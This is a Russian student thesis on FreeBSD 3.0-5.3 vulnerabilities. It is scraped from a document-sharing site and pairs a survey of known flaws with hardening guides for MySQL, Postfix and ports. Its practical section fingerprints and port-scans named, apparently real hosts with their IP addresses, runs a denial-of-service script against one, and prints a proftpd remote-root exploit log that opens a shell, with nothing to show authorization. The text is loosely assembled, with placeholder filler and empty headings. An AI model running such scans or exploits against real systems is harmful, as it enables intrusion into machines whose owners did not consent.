Дипломная работа Борисов Сергей кб-601




Скачать 135.28 Kb.
НазваниеДипломная работа Борисов Сергей кб-601
Дата25.09.2012
Размер135.28 Kb.
ТипДиплом
Дипломная работа

Борисов Сергей

КБ-601


Исследование уязвимости линейки Операционной системы FreeBSD 3.0-5.3.

Введение

FreeBSD - это мощная операционная система для компьютеров архитектур, совместимых с x86, AMD64, Alpha, IA-64, PC-98 и UltraSPARC®. Она основана на BSD, версии UNIX®, созданной в Калифорнийском Университете в Беркли. Она разрабатывается и поддерживается большой командой разработчиков.

Выдающиеся возможности

Исключительный набор сетевых возможностей, высокая производительность, средства обеспечения безопасности и совместимости с другими ОС - вот те современные возможности FreeBSD, которые зачастую всё ещё отсутствуют в других, даже лучших коммерческих, операционных системах.

Мощное решение для Internet

FreeBSD является идеальной платформой для построения Internet или Intranet. Эта система предоставляет надёжные даже при самой интенсивной нагрузке сетевые службы, и эффективное управление памятью, что позволяет обеспечивать приемлемое время отклика для сотен и даже тысяч одновременно работающих пользовательских задач.

Огромное количество приложений

Качество FreeBSD вкупе с современным дешёвым и производительным аппаратным обеспечением ПК делают эту систему очень экономичной альтернативой коммерческим рабочим станциям UNIX®. Она прекрасно подходит для большого количества приложений как в качестве сервера, так и рабочей станции.

FreeBSD распространяется свободно

Хотя вы можете подумать, что операционная система с такими возможностями продаётся по высокой цене, FreeBSD распространяется бесплатно и поставляется со всеми исходными текстами.

Бюллетени безопасности FreeBSD

Служба информационной безопасности FreeBSD выпускает бюллетени безопасности для нескольких разрабатываемых веток FreeBSD. Это Ветки -STABLE и Ветки Security. (Бюллетени не выпускаются для Ветки -CURRENT.)


Обычно здесь присутствует только одна ветка -STABLE, хотя в процессе перехода от одной основной линии разработки к другой (например, с FreeBSD 4.x на 5.x) имеется временной интервал, в котором существуют две ветки -STABLE. Тэги ветки -STABLE носят имена типа RELENG_4. Соответствующие версии носят названия типа FreeBSD 4.6-STABLE.


Каждому релизу FreeBSD поставлена в соответствие ветка безопасности (Security Branch). Метки веток безопасности именуются как RELENG_4_6. Соответствующие построенные версии носят названия типа FreeBSD 4.6-RELEASE-p7.


Каждая ветка поддерживается службой безопасности ограниченное время, обычно до 12 месяцев после релиза. Ожидаемые времена жизни для поддерживаемых в настоящее время веток даны ниже. В колонке Ожидаемое время жизни указана ближайшая дата, по истечение которой ветка будет брошена. Пожалуйста, учтите, что эти сроки в будущем могут быть увеличены, но только исключительные обстоятельства могут привести к отказу от поддержки ветки раньше указанной даты.

Ветка Релиз Ожидаемое время жизни

RELENG_4 n/a 31 октября 2004

RELENG_4_8 4.8-RELEASE 31 марта 2004

RELENG_4_9 4.9-RELEASE 31 октября 2004

RELENG_5_2 5.2-RELEASE 31 июля 2004


Более старые релизы не поддерживаются, а их пользователям настоятельно рекомендуется произвести обновление до одной из поддерживаемых версий, указанных выше.


Определение цели дипломной работы.


Угроза – это потенциальная возможность определенным образом нарушить информационную безопасность.

Попытка реализации угрозы называется атакой, а тот кто предпринимает такую попытку – злоумышленником. Потенциальные злоумышленники называются источниками угрозы.

Чаще всего угроза является следствием наличия уязвимых мест в защите информационных систем (таких, например как ошибки в программном обеспечении).

… бла бла бла


В силу конкретности моего исследования, буду рассматривать преднамеренные угрозы доступности, целостности и конфиденциальности нацеленные против операционной системы FreeBSD, сервисов представляемых этой ОС, а также данных хранящихся в рамках это ОС.


Цель данной курсовой работы состоит в исследовании угроз безопасности связанных с ОС FreeBSD, проверка их опасности и возможности их реализации. Разработать методику проверки системы на наличие в ней уязвимых мест. На основе этой информации будут предложены варианты парирования угрозам.


В первой части исследования рассмотрим уязвимые места ОС FreeBSD. Для каждого из них определим характер угроз и опасность возможной атаки.

Отдельно будем рассматривать угрозы с источником вне операционной системы - т.е. удаленные, локальные угрозы внутри рассматриваемой ОС (локальной атакой называется атака из командной оболочки ОС), а также угрозы направленные на сервисы и портированные приложения.

ОС FreeBSD отличает то, что большинство приложений написанных сторонними производителями переделываются специально под эту операционную систему. Таким образом, в приложениях (таких как Web, Ftp, Mail сервисы) имеет место эффект уменьшения уязвимых мест по сравнению с другими ОС *nix.

Во второй части мы рассмотрим разные методы определения версии ОС, как начального этапа при проверке системы на наличие уязвимостей. Так же определим способы защиты системы от точного определения версии ОС злоумышленником.

В третьей части рассмотрим основные защитные механизмы ОС FreeBSD, методы тестирования наличие в них уязвимых мест, а так же способы нейтрализовать эти уязвимости.

В четвертой части приведен пример использования методики тестирования реальной системы на наличие уязвимых мест, а также приведены рекомендации для парирования связанных с этим угроз.

В пятой части я привел пример грамотной конфигурации системы ОС FreeBSD которая позволит добиться гарантированной степени безопасности.


Часть 1.

Рассмотрим возможные удаленные угрозы на различных уровнях работы ОС FreeBSD (На основе уровней TCP/IP). Всё взаимодействие объекта атаки с субъектом ОС FreeBSD начинается с поступления фрейма на сетевую карту. Далее они проходят некоторую проверку со стороны ОС и собираются во фрагменты IP проходят проверку ещё раз собираются в пакеты TCP. Далее ОС дает ответ либо пакеты маршрутизируются дальше или собираются и передаются какому-нибудь внутреннему сервису.

Соответственно угрозы безопасности для FreeBSD будут обусловлены наличием уязвимых мест в реализации стека TCP/IP, в реализации механизма маршрутизации или фильтрации трафика, в механизме передачи информации сервисам, в реализации сервисов; а также в грамотной конфигурации защитных механизмов.


Штатные средства обеспечения безопасности FreeBSD

  1. Ограничение количества запущенных демонов (служб), с помощью inetd

  2. Использование шифрованных каналов передачи информации – например SSH.

  3. Настройка соответствующих сетевых параметров.

  4. Tcp_wrappers, Ipfw , ipf , pf – механизм фильтрации входящих и проходящих пакетов.

  5. Разграничение прав пользователей.

  6. Изменение корня chroot и jail

  7. CVSup для свежих обновлений



Определение версии операционной системы и сервисов.

Защита в FreeBSD от определения версии операционной системы.

Методы тестирования уязвимостей.

Способы парирования уязвимых мест.

6. Защитные механизмы в FreeBSD.

Стандарт RFC определяет, что хост должен генерировать seq число случайным образом. В ранних версиях FreeBSD возможно было, обменявшись 3-мя пакетами с сервером, подключится после этого в любую TCP сессию.

Так же в ранних версиях замечена не правильная реализация стека TCP/IP, заведомо неправильная расстановка флагов может привести к краху системы.

Ещё одно уязвимое место в реализации TCP/IP заключается в том что в ранней версии FreeBSD 5.0 были не реализованы рекомендации RFC 1122, о том что система должна отбрасывать входящие SYN фрагменты пакетов направленные на широковещательные адреса (broadcast, multicast). Для проверки необходимо отправить на в локальную сеть пакет с SYN флагом, направленный на широковещательный адрес. Системы FreeBSD от которых придет ответ подвержены этой уязвимости.

Для усиления безопасности подключения к telnetd можно было использовать протокол kerberos и авторизовыватся на kerberos сервере. В ранних версиях FreeBSD в механизме авторизации существовала уязвимость.

В ранних версиях FreeBSD есть уязвимое место в реализации сервиса telnetd. Сервер, используя переменную TERMCAP окружения клиента, начинает анализировать произвольный файл на диске или поток данных от устройства в /dev/. Это происходит ещё до начала фазы login, то есть позволяет неавторизованному пользователю проводить DOS-атаку.

// проверка уязвимости

>telnet

telnet> environ define TERMCAP /etc/termcap

или environ define TERMCAP /dev/log

Пропатченный сервер выдает ошибку BAD_ENVIRON_VAR, современные версии ОС FreeBSD не содержат эту уязвимость и игнорируют параметр TERMCAP

//

Для фильтрации трафика в FreeBSD при использовании механизма маскарадинга – NAT, возможно использование правил фильтрации самого NAT сервиса. Например, команда nat deny_incoming запрещает инициализацию входящих соединений на внутренние адреса. Но из-за особенностей реализации в ранних версиях, при использовании нестандартных протоколов, таких как IPSEC происходило исключение из правил, и система пропускала пакет.

Ipfw - Сервис системы обеспечивающий фильтрацию пакетов. FreeBSD 4.2 и FreeBSD 3.5 имеет уязвимое место. Он некорректно обрабатывает пакеты с флагом ECE. Во время проверки пакет с этим флагом считается частью установленного соединения без дополнительных проверок. Таким образом, если мы используем правило типа ‘allow tcp from any to x.x.x.x established’, возможен доступ к хосту.

Ipfw имеет уязвимое место в FreeBSD 4.2-4.3 при фильтрации правил использующих ‘me’. При работе с интерфейсом PPP по правило me попадает не только локальный но и удаленный адрес участвующий в соединении. Таким образом необходимо в этом случае отказаться от использования в правилах директивы ‘me’.


7. Практическое исследование сети на основе ОС FreeBSD.

Идентификация.

В первую очередь выясним, какие IP адреса доступны извне. Это можно делать различными способами: пинговать сеть, обращаться на TCP,UDP порты. Далее с помощью нашей утилиты freefingerprint определим, относится ли ОС к FreeBSD, а также точную версию ОС FreeBSD.


powr.pssr.ru (195.38.48.12)

not FreeBSD host, mabe Linux


po.pssr.ru (195.38.48.13):

Running: not FreeBSD host, mabe Linux


usb.pssr.ru (195.38.48.55):

Running: FreeBSD 4.8


ampr.pssr.ru (195.38.48.61):

Running: not FreeBSD host, mabe Linux


energo.pssr.ru (195.38.48.67):

OS details: FreeBSD 4.10-STABLE


ns.pssr.ru (195.38.48.68):

Running: FreeBSD 4.8


w2.pssr.ru (195.38.48.73):

Running: not FreeBSD host, mabe Linux


svc.pssr.ru (195.38.48.112):

Running: not FreeBSD host, mabe Linux

195.38.48.176:

Running: not FreeBSD host, mabe Linux


Таким образом, интересующие нас системы это:

usb.pssr.ru (195.38.48.55):

energo.pssr.ru (195.38.48.67):

ns.pssr.ru (195.38.48.68):


Проанализировав известные удаленные уязвимости, получили, что energo.pssr.ru

их имеет, а другие 2 системы имеют удаленных уязвимых мест которые мы будем проверять.

Далее проведем поиск открытых портов и соберем баннеры сервисов установленных на системе.


Interesting ports on usb.pssr.ru (195.38.48.55):

PORT STATE SERVICE

25/tcp open smtp

53/tcp open domain

21/tcp open ftp

80/tcp open http

443/tcp open https

1723/tcp open pptp


Interesting ports on ns.pssr.ru (195.38.48.68):

(The 1614 ports scanned but not shown below are in state: closed)

PORT STATE SERVICE

25/tcp open smtp

53/tcp open domain


nteresting ports on energo.pssr.ru (195.38.48.67):

(The 1612 ports scanned but not shown below are in state: closed)

PORT STATE SERVICE

25/tcp open smtp

53/tcp open domain

113/tcp open auth

119/tcp open nntp


Тестирование.

На сервере usb версия ОС FreeBSD 4.8, подверженная уязвимости inetd демона.

Через это демон, скорее всего, запускаются службы ftp, http.

Для проверки используем скрипт /xploit/inetd47.pl

++++++++

perl inetd48.pl 195.38.48.55 21


сразу после этого пробуем подключистся к ftp


ftp 195.38.48.55

ftp: connection refused


как мы видим, в подключении отказано.

Данное уязвимое место позволяет произвести отказ в обслуживании на время до 10 минут.


Далее путем сбора баннеров и используя различные утилиты, определяем что ftp-сервис – это proftpd 1.2.9. В уязвимостях портов есть эксплоит для данного сервиса.

Используем этот эксплоит для проверки.


@---------------------------------------------------------@

# proftpd 1.2.7/1.2.9rc2 remote root exploit(01/10)-1.20 #

@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @

-----------------------------------------------------------

[+] Ret address:0xbffff25c

[+] Trying 220volt.info:21....ok

[+] Get banner:ok

<== 220 ProFTPD 1.2.9 Server (ProFTPD Default Installation) [lauryn.e-neverland.net]

[+] User demoacc logged in

[+] PORT 66,79,183,51,135,8

[+] STOR file 151991519915199.txt

[+] Listening on 34568 ....ok

[+] Accepted a client from 195.38.48.55

[+] Trying 220volt.info:21....ok

[+] Get banner:ok

<== 220 ProFTPD 1.2.9 Server (ProFTPD Default Installation) [lauryn.e-neverland.net]

[+] User demoacc logged in

[+] PORT 66,79,183,51,135,8

[+] RETR file 151991519915199.txt

[+] Listening on 34568 ....ok

[+] Accepted a client from 195.38.49.55

[+] The First time read:ok

[+] PORT 66,79,183,51,135,9

[+] RETR file 151991519915199.txt

[+] Listening on 34569 ....ok

[+] Accepted a client from 195.38.48.55

[+] Is it a shell on 195.38.48.55:43543


Как мы видим, эксплоит работает,

теперь мы можем получить shell с правами proftpd.

telnet 195.38.48.55 43543

[Shell] CONNECT 220volt.info


Далее произведем проверку на наличие локальных уязвимостей, которые позволят расширить привилегии до прав суперпользователя.

Для начала соберем точную информацию об операционной системе:

ftp>uname –a

FreeBSD usb.pssr.ru 4.8-RELESE FreeBSD: Mon Oct 15 2002

root@freebsd-stable.sentex.ca:/usr/obj/usr/src/sys/GENEIC i386

Проверяем файлы конфигурации к которым есть доступ.


Установка portupgrade


Порт portupgrade устанавливается, как и любой другой порт, путём

перехода в соответствующий каталог и выполнения команды make:


% cd /usr/ports/sysutils/portupgrade

% make install clean


Установка даст нам несколько весьма полезных утилит.


Чтобы быть уверенным, что Ваша коллекция портов актуальна и пригодна для

построения новейших приложений, используйте cvsup.


Синхронизация Вашего дерева портов


% cd /usr/ports/net/cvsup-without-gui

% make install clean


cvsup можно использовать для поддержания в актуальном состоянии как

исходных текстов операционной системы, так и коллекции портов. Если

Вам нужно обновлять только коллекцию портов, Вам поможет такой файл:


% more /root/cvs-supfile

*default host=cvsup.ca.freebsd.org

*default base=/usr/local/etc/cvsup

*default prefix=/usr

*default release=cvs delete use-rel-suffix compress

ports-all tag=.


Для использования этого файла, запустите с правами superuser'а

команду:


% cvsup -g -L 2 ~/cvs-supfile


Команда cvsup загрузит последние дополнения коллекции портов и добавит

их к Вашему дереву. Этот тип команды подразумевает ежедневное

применение, и просто просится в cron.


Чтобы посмотреть,

насколько свежие у Вас порты, наберите:


$ ls -l /usr/ports/INDEX

-rw-r--r-- 1 root wheel 3678738 May 17 17:04 INDEX


Апгрейд портов


% portupgrade <название порта>


Безопасная установка MySQL.

MySQL является одной из наиболее популярных баз данных. Она предлагает простые, но в то же время очень эффективные механизмы защиты. К сожалению, заданная по умолчанию инсталляция MySQL, а в особенности пустой пароль по умолчанию и потенциальная уязвимость к атакам переполнения буфера, делают базу данных MySQL простым объектом для нападений.

1.1 Функциональные возможности

Мы предполагаем, что Web-сервер Apache вместе с PHP модулем, был установлен в соответствии с требованиями предыдущего раздела, и помещен в каталог /chroot/httpd.


Кроме этого мы также принимаем следующее:

  • База данных MySQL будет использоваться только PHP приложениями, установленными на том же самом хосте;

  • Для управления базой данных будут использоваться стандартные административные средства, типа mysqladmin, mysql, mysqldump и т.д.;

  • Для удаленного резервирования MySQL данных будет использоваться SSH протокол.


1.2 Необходимые условия для защиты

Чтобы достигнуть самого высокого возможного уровня защиты, установка и конфигурация mysql должна быть выполнена в соответствии со следующими требованиями:

  • база данных mysql должна быть выполнена в chrooted среде;

  • процессы mysql должны выполняться под уникальным UID/GID, неиспользуемым никаким другим системным процессом;

  • Должен быть разрешен только локальный доступ к mysql;

  • Основная учетная запись mysql должна быть защищена “сложным” паролем;

  • Будет переименована учетная запись администратора;

  • Должен быть заблокирован анонимный доступ к базе данных (используя учетную запись nobody);

  • Должны быть удалены все типовые базы данных и таблицы.


2. Chrooting сервер

Мы не будем подробно рассматривать последовательность установки и конфигурации mysql. Достаточно показать как можно эффективно поместить его в chrooted среду.


Первый шаг защиты mysql должен подготовить chrooted среду, в которой будет выполняться mysql сервер.

2.1 Подготовка chroot среды

Чтобы подготовить chrooted среду, мы должны создать следующую структуру каталога:

mkdir -p /chroot/mysql/dev
mkdir -p /chroot/mysql/etc
mkdir -p /chroot/mysql/tmp
mkdir -p /chroot/mysql/var/tmp
mkdir -p /chroot/mysql/usr/local/mysql/libexec
mkdir -p /chroot/mysql/usr/local/mysql/share/mysql/english



2.2 Установка прав доступа

Права доступа к вышеупомянутым каталогам должны быть установлены следующим образом:

chown -R root:sys /chroot/mysql
chmod -R 755 /chroot/mysql
chmod 1777 /chroot/mysql/tmp



2.3 Создание структуры каталогов

Затем, необходимо скопировать следующие файлы в новую структуру каталога:

cp/usr/local/mysql/libexec/mysqld/chroot/mysql/usr/local/mysql/libexec/

cp/usr/local/mysql/share/mysql/english/er rmsg.sys/chroot/mysql/usr/local/mysql/share/mys ql/english/

cp/etc/hosts/chroot/mysql/etc/

cp/etc/host.conf/chroot/mysql/etc/

cp/etc/resolv.conf/chroot/mysql/etc/

cp/etc/group/chroot/mysql/etc/

cp/etc/master.passwd/chroot/mysql/etc/passwords

cp/etc/my.cnf/chroot/mysql/etc/


2.4 Сжатие паролей и групп

Из файлов: /chroot/mysql/etc/passwords и /chroot/mysql/etc/group мы должны удалить все строки кроме учетной записи mysql и группы. Затем, мы должны, создать базу данных паролей (допустимо только в FreeBSD):

cd /chroot/mysql/etc
pwd_mkdb -d /chroot/mysql/etc passwords
rm -rf /chroot/mysql/etc/master.passwd


2.5 Специальные соображения

Мы должны создать специальный файл устройства /dev/null:

ls -al /dev/null

crw-rw-rw- 1 root sys 2, 2 Jun 21 18:31 /dev/null

mknod /chroot/mysql/dev/null c 2 2

chown root:sys /chroot/mysql/dev/null

chmod 666 /chroot/mysql/dev/null

Теперь необходимо скопировать базу данных mysql, которая содержит таблицы, созданные в процессе инсталляции mysql:

cp-R/usr/local/mysql/var//chroot/mysql/usr/local/mysql/var

chown-R mysql:mysql/chroot/mysql/usr/local/mysql/var

2.6 Проверка конфигурации

Теперь MySQL готов к запуску в chrooted среде. Мы можем проверить, правильно ли запускается MySql, выполнив следующую команду:

chrootuid /chroot/mysql mysql /usr/local/mysql/libexec/mysqld &

Если произойдет какая-либо ошибка, то необходимо будет использовать команду truss или подобную ей, типа ktrace/kdump, strace, и т.д. Это поможет нам определить и устранить причину проблемы.


Заметьте, что для выполнения процесса mysqld, вместо chroot, как в случае Apache или PHP, использовалась программа chrootuid. Главное отличие состоит в том, что chrootuid меняет владельца запущенного процесса. В нашем примере, mysqld выполняется в chrooted среде, но владелец процесса - не root, а пользователь mysql. Chrootuid во многих операционных системах не установлен по умолчанию, поэтому необходимо загрузить и установить эту программу вручную. Программа Chrootuid может быть загружена здесь .


Наконец, необходимо создать основной сценарий, который будет использоваться для запуска mysql во время загрузки операционной системы. Пример такого сценария показан ниже:


#!/bin/sh

CHROOT_MYSQL=/chroot/mysql

CHROOT_PHP=/chroot/httpd

SOCKET=/tmp/mysql.sock

MYSQLD=/usr/local/mysql/libexec/mysqld

PIDFILE=/usr/local/mysql/var/`hostname`.pid

CHROOTUID=/usr/local/sbin/chrootuid

echo -n " mysql"

case "$1" in

start)

rm -rf ${CHROOT_PHP}/${SOCKET}

nohup ${CHROOTUID} ${CHROOT_MYSQL} mysql ${MYSQLD} >/dev/null 2>&1 &

sleep 5 && ln ${CHROOT_MYSQL}/${SOCKET} ${CHROOT_PHP}/${SOCKET}

;;

stop)

kill `cat ${CHROOT_MYSQL}/${PIDFILE}`

rm -rf ${CHROOT_MYSQL}/${SOCKET}

;;

*)

echo ""

echo "Usage: `basename $0` {start|stop}" >&2

exit 64

;;

esac

exit 0


В нашей системе FreeBSD, вышеупомянутый сценарий должен быть помещен в каталог /usr/local/etc/rc.d, под именем mysql.sh.


Безопасная конфигурация почтового сервиса.

Будем использовать Postfix – как один из самых безопасных и удобных. К тому же он без проблем размещается в chroot окружении:

Будем считать, что Postfix установлен в обычном режиме и настроим его для запуска в chroot.

1. В /var/spool/postfix создаем директории dev и etc.

В etc копируем файлы /etc/host.conf /etc/localtime /etc/services /etc/resolv.conf


2. Правим master.cf, ставим в колонке chroot символ 'y' у следующих процессов:

smtp, pickup, cleanup, qmgr, rewrite, bounce, defer, trace, verify, flush, relay, showq, error


3. Активируем proxymap для чтения файлов из вне chroot окружения (/etc/passwd, aliases, различные "map"-файлы), например:

local_recipient_maps = $alias_maps proxy:unix:passwd.byname

relay_domains = $mydestination, proxy:hash:/usr/local/etc/postfix/relay_domains

smtpd_sender_restrictions = check_sender_access proxy:hash:/usr/local/etc/postfix/ access,

reject_non_fqdn_sender, reject_unknown_sender_domain

smtpd_client_restrictions = check_client_access proxy:hash:/usr/local/etc/postfix/access_clients,

check_recipient_access proxy:hash:/usr/local/etc/postfix/spam_allowed,

check_client_access proxy:hash:/usr/local/etc/postfix/antispam/blocklist/block_list,

check_client_access proxy:hash:/usr/local/etc/postfix/antispam/blocklist/block_list_arc,

check_client_access regexp:/usr/local/etc/postfix/dsl_stoplist.txt,

reject_rbl_client rbl.test.ru

smtpd_recipient_restrictions = check_recipient_access proxy:hash:/usr/local/etc/postfix/fullboxes,

reject_non_fqdn_recipient,

permit_mynetworks,

reject_unknown_recipient_domain,

reject_unauth_destination

transport_maps = proxy:hash:/usr/local/etc/postfix/transport

proxy_read_maps = $smtpd_helo_restrictions $smtpd_recipient_restrictions $smtpd_sender_restrictions \

$smtpd_client_restrictions $local_recipient_maps $mydestination $virtual_alias_maps \

$virtual_alias_domains $virtual_mailbox_maps $virtual_mailbox_domains $relay_recipient_maps \

$relay_domains $canonical_maps $sender_canonical_maps $recipient_canonical_maps \

$relocated_maps $transport_maps $mynetworks


3. Создаем дополнительный syslog сокет в chroot окружении:

FreeBSD: "syslogd -l /var/spool/postfix/dev/log"


Аналогично про настройку BIND в среде chroot можно прочитать в

http://www.freebsd.org.ru/how-to/dns/securing-bind.html


Настройка ProFtpd сервера в jail окружении:

http://www.ezunix.org/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=48&page=1


Запуск Apache в jail environment под FreeBSD:

http://kiev1.org/page-1343.html


Краткое руководство по запуску isc-dhcpd в chroot.

http://freebsdaddicts.org/modules.php?name=Sections&op=viewarticle&artid=15


Подборка патчей для помещения избранных пользователей в chroot окружение с входом через SSH:

http://chrootssh.sourceforge.net/


Помещение сервисов (пример для Qpopper, Sun RPCBIND, sendmail) в chroot.

http://www.linuxexposed.com/Articles/Security/Chrooting-daemons-and-system-processes.html

Похожие:

Дипломная работа Борисов Сергей кб-601 iconВыпускная квалификационная работа (дипломная работа)
Тема дипломной работы формулируется научным руководителем или в совместном обсуждении студента и научного руководителя и утверждается...
Дипломная работа Борисов Сергей кб-601 iconЛитература к выставке «Грамотное управление впечатлением в обществе»
Борисов В. К. Имидж делового человека / В. К. Борисов // Этика деловых отношений: учебник для ссузов / Борисов В. К. [и др.]. М.,...
Дипломная работа Борисов Сергей кб-601 iconНастоящая дипломная работа посвящена фольклору русским и чешским народным танцам. Дипломная работа состоит из теоретической части, залоключения, резюме и
В русской части дипломной работы обращено особое внимание на развитие народного танца у восточных славян. Настоящая дипломная работа...
Дипломная работа Борисов Сергей кб-601 iconДипломная работа по теме: Документно-ориентированное
Дипломная работа выполнене в рамках гранта рффи 03-01-00339-а по проекту “Новые информационные технологии и базовое обучение информатике...
Дипломная работа Борисов Сергей кб-601 iconКраткое содержание проекта Данный проект проводится по дисциплине «Экология»
Зорин Михаил Александрович, Борисов Сергей Валерьевич, студенты группы а-08 (3 курс ппи)
Дипломная работа Борисов Сергей кб-601 iconIV. шадринск в исторической канве россии
Борисов Сергей Борисович, профессор, доктор культурологии. Шадринская энциклопедия: презентация (г. Шадринск)
Дипломная работа Борисов Сергей кб-601 iconДипломная работа: выполнение и защита
Методические рекомендации составлены на основе учебно-методического пособия: Дипломная работа: выполнение и защита. Учебно-методическое...
Дипломная работа Борисов Сергей кб-601 iconДипломная работа выполнена в цехе цифровой фотограмметрии фгуп урпцг «Уралгеоинформ»
Дипломная работа посвящена исследованию возможностей цифровой фотограмметрической системы photomod, предназначенной для решения полного...
Дипломная работа Борисов Сергей кб-601 iconДипломная работа по теме : “ Интерактивная база данных по дендраклиматологии ” Работу
Моя дипломная работа очень актуальна, потому что дендроклиматология – малоизученная и малоизвестная область биологии. Дендроклиматология...
Дипломная работа Борисов Сергей кб-601 iconДипломная работа по теме : “ Интерактивная база данных по дендраклиматологии ” Работу
Моя дипломная работа очень актуальна, потому что дендроклиматология – малоизученная и малоизвестная область биологии. Дендроклиматология...
Разместите кнопку на своём сайте:
Библиотека


База данных защищена авторским правом ©lib.znate.ru 2014
обратиться к администрации
Библиотека
Главная страница